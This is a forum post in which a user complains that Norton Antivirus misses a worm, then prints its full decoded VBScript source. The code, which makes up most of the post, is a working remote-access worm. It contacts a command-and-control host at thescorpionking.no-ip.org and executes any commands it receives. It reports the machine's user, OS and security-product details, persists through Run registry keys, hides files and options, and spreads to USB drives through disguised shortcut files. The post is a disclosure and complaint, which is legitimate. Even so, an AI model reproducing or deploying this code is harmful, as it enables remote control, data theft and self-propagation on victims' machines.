Irresponsivility of Symantec Lab. for New Virus Signature

Its very unfortunate that our organisation is suffering from the spread of a virus which undetecteble by Norton Antivirus. I checked using VirusTotal web and found many AV systems not detecting this virus.

I had uploaded the virus file to symatec as specimen. Even today its not detecteble by Norton Antivirus.

 

I started decoding myself. The file name is Serviec.vbe, for uploading here I changed it to Serviec-vbe.txt . Its an encrypted visual basic script . Original file is also attached. Here is the script  after decoding the original file via website  greymagic ( http://www.greymagic.com/security/tools/decoder/ ):

Anybody can clearly see its indeed a virus which Symantec Scan says safe.

 

ON error Resume NEXt
Dim Z
z="winmgmts:{impersonationLevel=impersonate}!\\.\root\"
dim sh
seT sh=WScriPt.CreateObject("WScript.Shell")
dim fs
Set fs=CreateObject("Scripting.FileSystemObject")
DiM host
host="thescorpionking.no-ip.org"
Dim PoRt
port=1604
dim DR
DR=sh.ExpandEnvironmentsTrIngs("%temp%")&"\"
dim FN
FN="Serviec.vbe"
dim fh
dim us
us="~"
Ins
Dim i
i=0
WhiLe tRue
Dim a
A=splIt(post("ready",""),"Scorp")
SeleCt case a(0)
Case"exc"
dim Sa
sa=a(1)
a(0)=""
execute sa
case"uns"
uns
End SelecT
WScRipt.sleEp 4000
i=i+1
if i>2 Then
i=0
xins
end if
Wend
FuNctiOn uns
WScript.quit
End FuNction
FuncTion poSt(cmD,da)
PosT=""
DIm o
Set o=creatEObJECt("MSXML2.XMLHTTP")
o.OpeN"POST","http://"& host&":"&port&"/"&cmd,fAlse
O.setreqUeStHeader"\User\",inf
o.SEnd Da
post=o.responseText
End fUncTion
sUB xiNs
dim z
z="Software\Microsoft\Windows\CurrentVersion"
On Error resume neXt
sh.regwrIte"HKCU\"&z&"\Run\"&fn,cHRw(34)&dr&Fn&cHRw(34),"REG_SZ"
sh.regWriTe"HKLM\"&z&"\Run\"&fN,chrw(34)&dr&fn&ChRw(34),"REG_SZ"
Dim y
y=z&"\Explorer\Advanced\"
S.ReGDeLetE"HKCU\"&y&"Hidden"
S.RegWrite"HKCU\"&Y&"Hidden",0,"REG_DWORD"
S.ReGDelETe"HKCU\"&y&" HideFileExt"
S.regWrite"HKCU\"&Y&" HideFileExt",1,"REG_DWORD"
s.RegWriTE"HKCU\"&z&"\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
S.REgWrite"HKLM\"&z&"\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
fs.coPyfile wscript.scriptFullname,CReateObject("Shell.Application").NameSPacE(&H7).Self.PATh&"\"&fn,true
for each Xx In fs.DrIves
if xx.Isready thEn
if xx.freeSpaCe>0 then
if xx.drivetype=1 then
if fs.FILeexists(xx.path&"\"&fn)then
fS.gEtfile(xx.path&"\"&Fn).Attributes=0
eND if
fs.coPyfiLe Dr&fn,Xx.Path&"\"&fn,truE
For Each X IN fs.GetFoldEr(xx.patH&"\").files
wscript.sleep 1
if instr(x.name,".")then
if lcAse(Split(x.naMe,".")(UBouNd(split(x.naMe,"."))))<>"lnk"then
x.atTRibuTes=2
if ucase(x.name)<>ucase(fN)then
With Sh.CreateShoRtcut(xx.Path&"\"&x.name&".lnk")
.TArgetPath="cmd.exe"
.WoRKINgDirectorY=""
.Arguments="/c start "&ReplacE(fn," ",ChrW(34)&" "&ChrW(34))&"&start "&replacE(x.name," ",ChrW(34)&" "&ChrW(34))&" & exit"
.IconLocatiOn=sH.REgreAd("HKLM\SOFTWARE\Classes\"&sh.regread("HKLM\SOFTWARE\Classes\."&Split(x.name,".")(UBound(Split(X.name,".")))&"\")&"\DefaultIcon\")
if insTr(.iconLocAtion,",")=0 then
.iconloCaTion=.iCONlOcaTion&",0"
enD if
.SAve()
end wITh
end if
eNd if
end if
Next
eNd if
eNd if
eNd if
next
Err.ClEar
eNd sub
Dim xInf
FuncTioN inf
ON Error reSUmE next
IF xinf=""tHen
DIm s
s="??"
s=HWD
inf=iNf&s&"\"
s="??"
s=sh.EXpandEnvironmEnTStrings("%COMPUTERNAME%")
inF=inf&S&"\"
s="??"
S=Sh.EXpAndEnvironmenTstrings("%USERNAME%")
iNf=inf&s&"\"
s="??"
inf=Inf& Os&"\\0.02\"&us&"\"&pid&"\"&anti("antivirusProduct")&"/"&ANti("FireWallProduct")&"\"&sCoUntry&"\"&ACt
xiNf=inf
Else
iNf=xinf
eNd If
end FuncTion
FuNcTion anti(an)
on ErRor ResUme NeXt
Set b=GetOBjeCt(z&"SecurityCenter")
SeT bb=b.ExecQuery("Select * From "&an,,48)
For EaCh bBb In BB
Anti=bbb.dispLAyNamE
nExt
end function
function sCountRY
Set R=GetObject(z&"default:StdRegProv")
R.GetStriNgvalue&H80000001,"Control Panel\International","iCountry",SCountrY
End fUnction
FuncTion OS
DiM v
v=sh.ExpanDENvironmentstRiNGS("%programfiles%")
dim r
r=InStr(1,V,"x86",vbTExtcOmpare)
if R=0 THEn
r=" x86 "
Else
r=" x64 "
END If
Set a=getObject(z&"cimv2")
Set V=a.ExecQueRy("Select * from Win32_OperatingSystem")
For eaCh C IN v
OS=c.captioN&c.CSDVeRSIon&r
Exit for
Next
End FUnction
FunctIOn PId
PID=0
PID=GetObject(z&"cimv2").Get("Win32_Process.Handle='"&sh.Exec("mshta.exe").ProceSsID&"'").ParentProcESsiD
end Function
FUnctiON ins
On error resume next
us=sH.regrEad("HKCU\Software\sc")
if us="~"tHen
if lcase(mid(wscripT.scRiPtfullnaMe,2))=":\"&lcase(fn)tHen
us="y"
Sh.reGwrite"HKCU\Software\sc",us,"REG_SZ"
Else
uS="n"
Sh.regwrite"HKCU\Software\sc",us,"REG_SZ"
end if
ENd if
ErR.clear
fS.copyfilE wscript.scRiptfullname,dR&fn,truE
set fH=Fs.OpenTextFIle(Dr&fn,8,falSe)
if Err.NUMber>0 theN
WscRipt.quIt
end iF
xinS
end function
functiOn HWD
SEt a=GetObjEct("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa=a.ExeCquery("SELECT * FROM Win32_LogicalDisk")
for EaCh Aaa In aa
if aaa.VoLumeSerialNUMBer<>""tHen
HWd=aaa.VOlUmeSErialNumber
eXit for
End if
Next
enD function


[Edit: Removed infected attachment to conform with the Participation Guidelines and Terms of Service]